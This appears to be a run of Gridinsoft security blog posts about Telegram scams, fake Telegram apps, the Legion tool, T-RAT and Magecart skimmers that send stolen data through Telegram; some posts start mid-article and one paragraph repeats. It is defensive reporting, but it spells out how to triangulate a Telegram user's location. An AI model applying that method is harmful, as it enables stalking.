What are Telegram Scams?

Telegram scams are schemes that either operate within the Telegram app itself or lure users from the app to a dangerous third-party site. Scammers flock to Telegram because of its popularity and ease of use. All you need to sign up is a phone number. Scams range from traditional phishing schemes to sophisticated bot attacks masquerading as legitimate customer service agents. Here are examples of the most common methods of fraud in Telegram:

• Phishing attacks. A Telegram user is posing as someone the victim would trust (such as a friend, colleague, or support agent) to trick the victim into revealing their personal information.
• Off-Platform Fraud. Someone sends the victim a link or asks them to go from the Telegram platform to a “safer site”. Cybercriminals could use this site to steal your personal information or even infect your device with malware.
• An attack through a Telegram bot. Because Telegram allows users to create bot accounts, many fraudsters use them to target vulnerable legitimate accounts. In 2020, the resource administration blocked about 350,000 accounts of bots due to their use by fraudsters and criminals.
• Crypto fraud. Telegram has become a popular platform for people interested in cryptocurrencies and blockchain. Many cybercriminals target Telegram users. They aim to access their cryptocurrency wallets and transfer their bitcoins (BTC), Ethereum, and other coins to themselves.

These are just a few examples of high-level scams that users can find on Telegram. Unfortunately, scammers are finding new ways to commit fraud and steal personal information from unsuspecting Telegram users. Next, we’ll look at the Telegram scam methods you should be wary of.

Fake Telegram channels and groups

Telegram channels and groups are places where many like-minded people can get together and discuss topics that interest them. However, scammers often create “copycat” versions of popular channels to lure victims with false ones. These channels will look just like the ones they know. They may have similar names and profile images, the same anchored posts, and administrators with usernames identical to legitimate ones. You can also see much activity from “users” – actively chattering about promotions, quick-enrichment schemes, or supposed free prizes promoted by the channel. (Most of these channels target cryptocurrency investors with instant token sales before launching.) However, other users or administrators will soon start contacting the potential victim to get them to click the link or provide personal information, which they can use to steal identities or hack the account.

How to spot the scam

If you have been added (or joined) a new Telegram group, check if you can send messages. If there is no such option, this is a “broadcast-only” channel. This means that only administrators can post messages.

What to do:

• Report impostors or dangerous channels.
• Change your privacy settings to prevent everyone from adding you to new groups and channels.

Telegram Crypto Expert Scams

Telegram is probably the most popular messaging platform for people who are into cryptocurrencies and blockchain. But clever scammers have taken advantage of this fact and started posing as crypto experts on Telegram to lure coins, money, or logins from victims. Most of these scams promise a “guaranteed” return on your cryptocurrency investment. Scammers will post replies to comments on Twitter or contact the victim directly on Telegram, claiming they can provide a 50% return on investment. If the victim wants to connect, the scammers will ask to open an account at their “special” crypto exchange. They will also show charts and graphs demonstrating that the investment is increasing. However, when the victim tries to get their “earnings”, the scammer will disappear.

A man once sent $50 in bitcoins to exchange and soon made a $30 profit. He then told his friends, whom all invested their savings in the scam. But when his friends sent all the money in, the fake broker disappeared along with all the money.

How to spot the Crypto Expert Scam

The FBI estimates that about 25,000 people were victims of cryptocurrency fraud last year and lost nearly $1 billion. Suppose someone promises a “guaranteed” income or claims access to a “special” cryptocurrency exchange. In that case, these are all clear signs of Telegram cryptocurrency investment fraud.

What to do:

• Ignore anyone who claims a “guaranteed” return on any investment, especially cryptocurrency.
• Do not invest in “special” cryptocurrency exchanges, as they are often counterfeited.
• Never send money, cryptocurrency, or account information to someone you have only communicated with on Telegram or other messaging platforms such as Whatsapp.

Phishing with Telegram Bots

Since Telegram allows ordinary users to create and use bots on the platform, scammers couldn’t help but take advantage of it. Telegram bots operate natural language processing and AI to engage in realistic conversations, making it difficult to tell if you are being scammed. In one such scam, hackers used the SMSRanger bot to impersonate representatives of banks and companies like Apple Pay, Google Pay, and PayPal. Forums claim that such bots are about 80% effective if the user answers the call. Worse, anyone can access these bots for only $300 a month.

How to spot the Telegram Bots Phishing

Telegram bot scams show typical signs of phishing:

• Sense of urgency.
• Fake or strange phone numbers
• Grammatical and spelling errors
• Requests for confidential information

What to do:

Suppose you receive a phone call from somebody claiming to be from your bank, hang up and call the bank back using their official number. Likewise, scammers can spoof or disguise their number to make it look like it’s coming from someone else.

Remember: The company will never contact you via Telegram or any third-party messaging platform.

Telegram Tech Support Scams

Sometimes scammers create accounts that mimic legitimate support agents. They use bots to scan groups and channels for keywords and phrases and then contact victims claiming to be from the company. Along the way, they will start asking the victim for confidential information or demanding that they pay for “premium” support. Such accounts may contain realistic names (e.g., “Coinbase Support Chat”). They may even ask to manage your laptop to “fix” the problem remotely.

How to spot Tech Support Scams

If you are dealing with problems with a company or account, always contact them directly through official channels. Be wary of any account that contacts you first and offers support. Likewise, avoid those who charge for “premium” support or make you pay to “upgrade” your account. These are scammers.

What to do:

• Pay attention to the account’s username to see if it matches its displayed name.
• Block and report all suspicious accounts to both Telegram and the impersonator company.

Telegram Cryptocurrency Giveaways

Free prizes, sweepstakes, and raffles are some of the oldest types of scams. In these scams, a bot or user pretends to offer gifts from well-known companies (such as Amazon, Apple, or Venmo ) or cryptocurrency exchanges. However, to receive a prize, you must provide your banking information and personal details and pay a “commission”. Once you give the scammers what they want, they disappear.

How to spot the Cryptocurrency Scam

Although some companies run raffles and almost all require you to take some initial action, it’s likely that the raffle is a scam if you haven’t participated in any raffles. In such cases, it is best to contact the company directly to see if the drawing is genuine or not.

What to do:

• Never pay a “commission” to claim a prize, especially if you are asked to pay in cryptocurrency or through payment applications such as Zelle, Venmo, or Cash App.
• Block any accounts that contact you and claim to be offering a prize.

Fake Admin Accounts

Each Telegram username is unique. This prevents the scammer from exactly copying a pre-existing username. However, to pull off their dirty business, scammers create usernames that look similarly to the original. Such accounts can also contact the victim to “help” them after they ask a general question. In reality, scammers try to gain access to the account or lure the victim off the platform, where they can scam them with a phishing site.

How to spot the Fake Admin Scam

Pay attention to the account name and misspellings or permutations of letters in the name, especially if the username and display name don’t match. For example, “TichSupport” instead of “TechSupport”, or fake “BitgetToken” instead of “bitgetEN”. In some cases, the username may be hidden. Also, be careful of users who send you private messages rather than posting them publicly in a group. Private messages are a favorite tool of Telegram scammers, as these messages make it difficult to verify whom you’re communicating with.

What to do if you encounter Telegram scammers:

• Never share personal information or passwords in a direct message.
• Search the group to find messages from the user who contacted you. If nothing comes up, you’re probably dealing with a scammer.
• Report fraudulent accounts to both Telegram and the company you asked the question to.

Classiscam: Fake Classified AD scams

The “Classiscam” scheme is a Telegram bot scam that lured $6.5 million from victims. Criminals create fake listings for products such as laptops, cameras, and iOS devices on topical sites. The ad will ask the victim to contact Telegram to discuss the deal. However, when the victim sends them a message, there will be a connection to a bot designed to steal personal information.
Alternatively, the Telegram scammers contact directly on Telegram and then send the victim a link to their list. When the victim clicks on it, they will be taken to a page that looks almost identical to a page on Facebook Marketplace, Craigslist, or other sites. To complete the sale, the victim will be asked for personal information, including home address and credit card information.

How to spot Classiscam

Look for red flags of scams in online sales, suspiciously low prices, and sellers who refuse to meet in person or ask you to talk to them via Telegram. Look out for odd design details, spelling or grammatical errors, or an “unsecured” URL if you get to a site to make a sale. (A secure URL uses HTTPS and an unprotected one uses ” HTTP “)

What to do:

• Always try to review items in person or verify sellers before sending them payments or any information.
• Use only payment platforms that protect your money, such as PayPal or credit cards. Then, if you’ve been scammed, you’ll have a better chance of getting your lost money back through these payment methods.

“Pump And Dump” in Telegram Crypto Channels

In this scam, the Telegram channel owners try to manipulate the price of cryptocurrency with a large group of participants. The administrators claim to have “special” knowledge; they are trying to increase the value of an asset they own and then sell it before it collapses. Sometimes administrators charge a fee for VIP membership, which doubly hits their victims.

How to spot Pump And Dump

Many of these fraudulent Telegram channels call themselves “signaling groups”, one common sign of a scam is a sense of urgency. These groups often try to get you to act quickly without thinking and cause you to fear that you might miss out on a great opportunity. Remember the golden rule: If something seems too good to be true, it probably is.

What to do:

• Don’t be fooled by a sense of urgency. Always do your due diligence before investing.
• Look up the history of this group. How successful have they been in predicting price increases in the past?

Fake Job and offers over Telegram

Job scams are widespread on professional platforms such as LinkedIn; many use Telegram as one of their elements. Fake employers post lists of tempting jobs with high salaries and flexible work schedules. Their only requirement is that the victim adds “Hiring Manager” to Telegram. Once she contacts the manager, they will try to get the victim to provide confidential information or ask for payment for training materials.

How to spot the Fake Job Scam

Almost all fake job scams follow the same formula. The “Employer” will offer too perfect terms and demand that you contact him via Telegram for an interview. These fake scammers will ask for more information (like your SSN), which is also required for a legitimate job application. They may also ask you to pay for the training materials with your own money or a check they send you. Either way, you will never get a refund, or the review will be wrong.

What to do:

Look for signs that the job is a scam. This may include a short interview or no paperwork when the recruiter says you are “hired”.
Do not give recruiters personal or confidential information until you have seen the official contract and met with them in person.

“Friend in Need” scams

In this scam, scammers gather enough information about the victim’s friends or family, then approach and ask for financial help. For example, they may tell you that they have been in a car accident and need your use paying medical bills.

How to spot the “Friend in Need” scam:

Listen to the language they use. Does it sound like your friend? Are they misusing words or constructing sentences awkwardly? Also, could you pay attention to their sense of urgency? For example, would your friend ask you for this favor without context or explanation?

What to do:

• If you can, call this person by phone or another communication channel, and find out if this is true.
• If there is no way to call, ask questions that only a natural person would answer, such as details about recent collaborations (and that you didn’t write about online).
• If you confirm it’s a scammer, immediately block and notify the account owner of account hacking.
• Let your friends know so they won’t be targeted next time.

Telegram Romance Scams

Sometimes scammers engage in an online romance with a victim to gain trust. On Telegram, this often focuses on liaisons or sexual content. Many scammers will ask for gifts or money to cover expenses to come to the victim. A Reddit user once described chatting with a woman on Telegram who said she couldn’t meet because she needed to babysit. She requested a Steam gift card to be sent so her kids could be distracted (gift cards are often requested during scams because they are another form of currency that cannot be traced). Otherwise, scammers may ask the victim to send them photos or videos of a sexual nature, which they can then use to blackmail her.

How to spot a Romance Scam:

The caller can never meet in person, and he will always have excuses that prevent him from even making a video call. Instead, he will try to make the relationship more intimate as quickly as possible by sending sensitive photos (which are usually stolen from other accounts). However, the most important way to spot a scammer is when he asks for money.

What to do:

• Never, under any circumstances, send money to people you’ve only met on Telegram, regardless of what they tell you to do.
• Don’t give out too much personal information at once. Even simple questions about your family or work can be used to hack your accounts or brute force your passwords.

How To Prevent Telegram Scams

• Be as vigilant as possible of all links, even if your friend sent them.
• Configure your privacy settings. Once you create your Telegram account, ensure end-to-end encryption is enabled. Include a password or fingerprint ID and add two-step authentication (2FA) for extra security.

• Never share your login credentials. Don’t trust threatening messages purporting to come from Telegram, cryptocurrencies, banks, or any other websites that store your personal information.
• Update the phone number associated with your account. This will help confirm that your account belongs to you if you lose access.

The post Top 11 Telegram Scams in 2024 appeared first on Gridinsoft Blog.

Trojanized Telegram Clients Spread on Google Play

Telegram’s Play Store version is identified with the package name "org.telegram.messenger," while the direct APK file downloaded from Telegram’s website is associated with the package name "org.telegram.messenger.web". Malicious packages named “wab,” “wcb,” and “wob” were used by threat actors to trick users into downloading fake Telegram apps. Despite looking like the authentic Telegram app with a localized interface, infected versions contained an additional module. That was missed by Google Play moderators. A few days ago, experts revealed that a malware campaign called BadBazaar was using such rogue Telegram clients to gather chat backups.

Examples of fake Telegram apps:

Security experts have recently discovered a number of malicious apps on Google Play that claim to be versions of Telegram in Uyghur, Simplified Chinese, and Traditional Chinese languages. These apps have descriptions written in their respective languages and contain images that are very similar to the official Telegram page on Google Play, making it difficult to distinguish them from the genuine app.

The devs of these fake apps promote them as a faster version of a regular client, citing a distributed network of data centers worldwide. They use this as bait to persuade users to download the mods instead of the official Telegram app.

How dangerous are fake Telegram apps?

Millions of users have downloaded apps that were found to have malicious features. Among other things, malicious copies have functionality to capture and transmit sensitive information such as names, user IDs, contacts, phone numbers and chat messages to a server controlled by an unknown actor. Experts who discovered this activity have codenamed it Evil Telegram. Google has since taken down these apps from its platform.

Nonetheless, the poor app moderation problem in Google Play has persisted for almost a decade. You can upload literally whatever you want – even malware – and it may be deleted only after numerous reports saying it is malicious. And there’s still no guarantee that the reports will be processed in a suitable time; some rogue apps remain in GP for months. For that reason, the threat will most probably resurface later, especially considering the growing popularity of Telegram.

How to stay safe?

Here are some important tips to keep yourself safe from infected versions of popular messaging apps and other threats that target Android users:

• As I’ve just said, Google Play isn’t completely immune to malware attacks. However, it’s still a much safer option than other sources, so always download and install apps from official stores.
• Before installing any app, even from official stores, please take a closer look at its page and ensure it’s legitimate. Pay attention to the app’s name and developer. Cybercriminals frequently apply typosquatting or spoofing in order to spread their malware.
• Reading negative user reviews is a good way to identify potential issues with an app. If there’s a problem with an app, someone has likely already written about it. Also try searching for reviews on the web. There are plenty of sites where you can leave your feedback without any censorship from the developer or Google. Using several independent sources will give a more clear view.

The post Spyware in Fake Telegram Apps Infected Over 10 million Users appeared first on Gridinsoft Blog.

Let me remind you that we also wrote that Microsoft Told How To Detect The Installation Of The BlackLotus UEFI Bootkit, and also that Experts discovered ESPecter UEFI bootkit used for espionage.

Attacks with Legion Hacker Tool

According to Cado Labs researchers, the Legion malware has modules for enumerating vulnerable SMTP servers, conducting remote code execution (RCE) attacks, exploiting unpatched versions of Apache, brute force cPanel and WebHost Manager (WHM) accounts, as well as interacting with the Shodan API and abusing AWS services.

The researchers say the malware shares similarities with another malware family, AndroxGh0st, which was first discovered by cloud security provider Lacework in December 2022.

Last month, SentinelOne published an analysis of AndroxGh0st, which showed that the malware is part of the AlienFox toolkit, which is offered to criminals to steal API keys and secrets from cloud services.

In addition to using Telegram to extract data, Legion is designed to hack web servers with CMS, PHP, or PHP-based frameworks such as Laravel.

Other targeted services include SendGrid, Twilio, Nexmo, AWS, Mailgun, Plivo, ClickSend, Mandrill, Mailjet, MessageBird, Vonage, Exotel, OneSignal, Clickatell, and TokBox.

In addition, Legion extracts AWS credentials from insecure or misconfigured web servers and sends spam SMS to users of US operators, including AT&T, Sprint, T-Mobile, Verizon, and Virgin.

What’s the matter?

The main goal of the malware is to use the infrastructure of hijacked services for subsequent attacks, including bulk spam mailings and opportunistic phishing campaigns.

The researchers also discovered a YouTube channel (created June 15, 2021) containing tutorial videos on Legion. Experts conclude that “the tool is widespread and most likely is paid malware.”

The location of the creator of this tool, who uses the Telegram nickname forzatools, remains unknown, although the presence of comments in Indonesian in the code indicates that the developer may be Indonesian or located in that country.

The post Legion Hacker Tool Used to Steal Data from Poorly Protected Websites appeared first on Gridinsoft Blog.

The resulting document contains training tips for agents and explains what kind of data can be obtained from the operators of various messengers and what legal permissions will be required for this.

The document is dated January 7, 2021, and, in general, does not contain any fundamentally new information, but it gives a good idea of what information the FBI can currently receive from services such as Message, Line, WhatsApp, Signal, Telegram, Threema, Viber, WeChat and Wickr.

In general, the training document confirms that usually the FBI cannot access the encrypted messages themselves, but they can request other types of information that can also be useful in investigations.

Let me remind you that I also reported that FBI removed web shells from vulnerable Microsoft Exchange servers without informing owners.

The post Unlocking the Secrets of Messaging Apps: An In-Depth FBI Study Guide on Accessible Data for Law Enforcement appeared first on Gridinsoft Blog.

Let me remind you that in the secret chat mode, you cannot forward messages to other users, and it is also possible to configure automatic self-destruction of all messages and multimedia after a certain time.

Independent information security specialist Dhiraj Mishra discovered that in Telegram version 7.3, self-destructing messages were not completely deleted from the recipient’s device.

So, the expert noticed that on macOS standard chats escape the sandbox path, where all received video and audio files are stored. Although this path works in secret chats, the received media files are still stored there, even if the messages in the chat itself have already destructed themselves, as they should have.

Additionally, Mishra discovered that Telegram was storing local access codes to unlock the app in plain text format. They were saved in the Users/[username]/Library/GroupContainers/6N38VWS5BX.ru.keepcoder.Telegram/accounts-metadata folder as JSON files.

The researcher discovered both problems at the end of December 2020, and they were fixed with the release of Telegram 7.4. Mishra received a reward of $3,000 for reporting both errors.

Let me remind you that I also reported that a researcher discovered vulnerability in Telegram, which allows to locate user.

The post Telegram for macOS did not delete self-destructing videos appeared first on Gridinsoft Blog.

Enthusiast Ahmed Hasan posted a message about the vulnerability found on his blog.

Several years ago, he already reported a similar flaw to the Line messenger development team. The creators of the messenger paid Hassan a bonus of $ 1,000 and fixed the problem.

Although Telegram only shows the distance to a particular user in the list, you can determine its exact location using triangulation.

To do this, you need to change your location twice, marking each time the distance to the user, and then draw on the map (for example, on Google maps) three circles with a centre in their coordinates and a radius equal to the found distance. The user will be at the intersection of the circles.

Let me remind you, by the way, that Researcher Earned $10,000 by Finding XSS Vulnerability in Google Maps.

At the same time, can be found only those users, who use the “People nearby” function.

It should be noted that alternative solutions in other applications for calculating the distance between users include the addition of a random number to the coordinates, which makes impossible determining the real geolocation, but in the case of Telegram, the developers decided to neglect this additional security measure.

The post Researcher discovered vulnerability in Telegram, which allows to locate user appeared first on Gridinsoft Blog.

Malware creators claim that this provides faster and easier access to infected computers from anywhere, and allows them to quickly steal data. However, T-RAT can also be controlled by more traditional methods, for example via RDP and VNC.

In addition, T-RAT owners can use a special mechanism for capturing data from the clipboard, which replaces strings similar to addresses of cryptocurrency and electronic wallets with the addresses of attackers. This allows successfully intercepting Qiwi, WMR, WMZ, WME, WMX, Yandex.Money, Payeer, CC, BTC, BTCG, Ripple, Dogecoin and Tron transactions.

The malware is also capable of working with terminal commands (CMD and PowerShell), blocking the victim’s access to certain sites (for example, antivirus and technical support sites), eliminating specific processes (disabling security and debugging software), and even deactivating the Taskbar and Task Manager.

G DATA experts write that T-RAT is just one of many families of malware that are equipped with the ability to control via Telegram, and this is not the first RAT that operates on such a model. So, similar functionality is possessed by: RATAttack (targeting Windows), HeroRAT (targeting Android), TeleRAT (used mainly against users from Iran, targeting Android), IRRAT (targeting Android), RAT-via-Telegram (available at GitHub, targeting Windows users) and Telegram-RAT (available on GitHub, targeting Windows users).

Let me remind fans of classic horror stories about viruses and monsters that Alien malware that steals passwords from 226 Android apps.

The post New T-RAT malware can be controlled via Telegram appeared first on Gridinsoft Blog.

He concluded this based on information obtained by Sansec, which specializes in combating digital skimming and Magecart attacks.

Let me remind you that initially the name MageCart was assigned to one hack group, which was the first to introduce web skimmers (malicious JavaScript) on the pages of online stores to steal bankcard data.

“Such an approach was so successful that the group soon had numerous imitators, and the name MageCart became a common name, and now it refers to a whole class of such attacks”, – remind history specialists of the information security company RiskIQ.

If in 2018 RiskIQ researchers identified 12 such groups, then by the end of 2019, according to IBM, there were already about 40 of them.

The researcher studied one of these malicious JavaScript and noticed that it collects all data from the input fields filled by victims and sends it to Telegram.

All transmitted information is encrypted using a public key, and having received it, a special Telegram bot sends the stolen data to the chat in the form of ordinary messages.

Affable Kraut notes that this method of data theft, apparently, is very effective, but it has a significant disadvantage: anyone who has a token for a Telegram bot can take control of the process.

Malwarebytes’ leading researcher, Jérôme Segura, was also interested in the script, and after examining it, he said that the author of this web skimmer used a simple Base64 for the bot ID, Telegram channel and API requests. Below you can see the diagram left by Segura and describing the entire attack process.

The researcher notes that data theft occurs only if the current URL in the browser contains one of the keywords indicating that this is an online store, and only when the user confirms the purchase. The payment details will then be sent to both the payment processor and the cybercriminals.

Jerome Segura writes that such a data extraction mechanism is a very practical solution, because it allows attackers not to worry about creating a special infrastructure for these purposes. In addition, it will not be easy to defend against this type of skimmer. Blocking Telegram connections will be only a temporary solution, since then the attackers can start using another legitimate service, which will also mask the “leak” of data.

Segura writes that such data extraction mechanism is a very practical solution, because it allows attackers not to worry about creating a special infrastructure for these purposes. In addition, it will not be easy to defend against this type of skimmer. Blocking Telegram connections will be only a temporary solution, since then the attackers can start using another legitimate service, which will also mask the “leak” of data.

Let me remind you that scientists have developed an attack that allows not to enter a PIN code while paying with Visa cards.

The post Magecart groupings extract stolen cards data via Telegram appeared first on Gridinsoft Blog.